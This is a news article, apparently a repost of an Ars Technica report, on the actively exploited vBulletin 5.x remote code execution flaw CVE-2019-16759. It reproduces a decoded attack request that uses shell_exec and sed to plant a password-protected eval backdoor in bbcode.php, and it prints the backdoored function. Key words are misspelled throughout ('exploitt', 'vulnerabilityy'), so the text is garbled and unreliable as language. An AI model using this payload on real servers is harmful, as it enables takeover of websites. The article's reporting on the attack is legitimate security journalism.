High-severity vulnerability in vBulletin is being actively exploited

Author: Amhd Net

Attackers are mass exploitting an anonymously disclosed vulnerabilityy that makes it possible to take control of servers running vBulletin, one of the Internet’s most popular applications for website comments. Sites running the app should take comments offline until administrators install a patch that vBulletin developers released late Wednesday morning.

The vulnerability was disclosed through an 18-line exploitt that was published on Monday by an unidentified person. The exploitt allows unauthenticated attackers to remotely execute malicious code on just about any vBulletin server running versions 5.0.0 up to 5.5.4. The vulnerabilityy is so severe and easy to exploitt that some critics have described it as a back door.

"Essentially, any attack exploitts a super simple command injection," Ryan Seguin, a research engineer at Tenable, told Ars. "An attacker sends the payload, vBulletin then runs the command, and it responds back to the attacker with whatever they asked for. If an attacker issues a shell command as part of the injection, vBulletin will run Linux commands on its host with whatever user permissions vBulletins' system-level user account has access to." Seguin has more in this technical analysis of the vulnerabilityy.

According to researcher Troy Mursch of the Bad Packets security intelligence service, attackers are using botnets to actively exploitt vulnerable servers. After decoding, some of the Web requests they send look like this:

"widgetConfig[code]=echo shell_exec('sed -i \'s/eval(\$code);/if (isset(\$_REQUEST[\"epass\"]) \&\& \$_REQUEST[\"epass\"] == \"2dmfrb28nu3c6s9j\") { eval(\$code); }/g\' includes/vb5/frontend/controller/bbcode.php && echo -n exploitted | md5sum'); exit;"

Prior to the malicious Web request, code in a section of vBulletin called

includes/vb5/frontend/controller/bbcode.php

looked like this:

function evalCode($code) { ob_start(); eval($code); $output = ob_get_contents(); ob_end_clean(); return $output; }

After the Web request has been sent, the same section is changed to this:

function evalCode($code) { ob_start(); if (isset($_REQUEST["epass"]) && $_REQUEST["epass"] == "2dmfrb28nu3c6s9j") { eval($code); } $output = ob_get_contents(); ob_end_clean(); return $output; }

Mursch told Ars:

The exploitt above modifies the includes/vb5/frontend/controller/bbcode.php via the "sed" command to add a backdoor to the code. This is done by setting a "password" (epass) of 2dmfrb28nu3c6s9j. By doing this, the compromised site will only execute code in the eval function if 2dmfrb28nu3c6s9j is set in future requests sent to the server. This would allow a botnet command-and-control (C2) server to exclusively exploitt CVE-2019-16759 and issue commands to the targeted site.

The vulnerabilityy itself has been regarded by some as a backdoor. This exploitt attempt basically backdoors sites via a backdoor. As for why threat actors are doing this, it's likely to build an inventory of bots while they figure additional ways to exploitt the compromised hosts – such as infecting them with DDoS malware and conducting denial-of-service attacks.

Some of the infected computers carrying out the attacks have been spotted in the past using the EternalBlue exploitt, developed by and later stolen from the National Security Agency, to compromise computers that have yet to install a patch Microsoft released in early 2017.

Some vBulletin users took to the software’s official support pages on Wednesday to report they had been hacked. "I received an email today from my hosting provider stating that ‘malicious code was detected on your website and a huge number of email spam messages originating from it,’" one user wrote here (free account required). Another user reported having an entire MySQL database deleted.

vBulletin is among the most widely used website commenting systems and is probably used on tens of thousands—possibly hundreds of thousands—of sites. Fortunately, version 5x makes up less than 7% of active installations, according to W3techs, a site that surveys the software used across the Internet. Still, Internet searches like this one suggest that 10,000 or more sites may be running vulnerable versions.

According to Chaouki Bekrar, founder and CEO of the Zerodium exploitt broker, the vulnerabilityy has been privately circulating for years.

"Many researchers were selling this exploitt for years," he wrote on Twitter. "Zerodium customers were aware of it since 3 years."

The availability of a working exploitt is aggravated by another publicly posted script that uses the Shodan search site to find vulnerable servers. Attackers can use it to generate a list of vBulletin sites that are susceptible and then use the exploitt to take them over.

The vulnerabilityy exists in default installations of the affected versions. According to Tenable’s publicly posted analysis, "an unauthenticated attacker can send a specially crafted HTTP POST request to a vulnerable vBulletin host and execute commands. These commands would be executed with the permissions of the user account that the vBulletin service is utilizing. Depending on the service user’s permissions, this could allow complete control of a host."

As advised earlier, the vulnerabilityy is so severe that vulnerable vBulletin users should take their forums offline until they have installed a patch developers published on Wednesday morning. The commenting system for Defcon.org, a site that’s regularly probed for easy-to-hack vulnerabilityies, was non-operational at the time this post went live. Several hours later the user forum returned.

Defcon founder Jeff Moss, told Ars his team took the site down to avoid getting hacked.

"We tested it right away and none of our defenses would have saved us," he said. "We checked logs and such and no attempts to attack us, but after we went back one line there were two in the first 30 minutes. Definitely active attackers."

Before a patch was available, people reported that they were able to successfully mitigate the vulnerabilityy by following the instructions here. Now that a patch is available, affected vBulletin users should install it at once.

This post was updated to add exploitt details from Mursch and comments from Moss.